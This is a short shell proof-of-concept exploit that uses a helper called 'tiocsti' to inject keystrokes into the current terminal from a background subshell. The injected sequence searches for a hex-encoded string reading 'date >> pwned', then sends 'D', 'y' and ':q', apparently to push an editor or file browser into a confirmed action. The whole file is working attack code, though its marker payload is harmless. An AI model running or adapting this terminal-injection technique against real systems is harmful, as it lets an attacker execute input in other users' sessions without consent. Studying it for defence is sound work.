#!/bin/sh

tty=`tty`
(
        exec < $tty
        # Without some sleeping, the exploit doesn't work -- the sleeps are
        # quite long, just to be on the safe side.
        # Note: There might be swap files in the directory (how??), so
	# we're better off searching for a known part of the file name
	# -- thanks to Tomas Hoger for pointing this out
        for a in '\r' '/0:64617465203e3e2070776e6564\r' 'D' 'y\r' '\r' ':q\r'; do
                sleep 1
                ./tiocsti "`printf "$a"`"
        done
)&
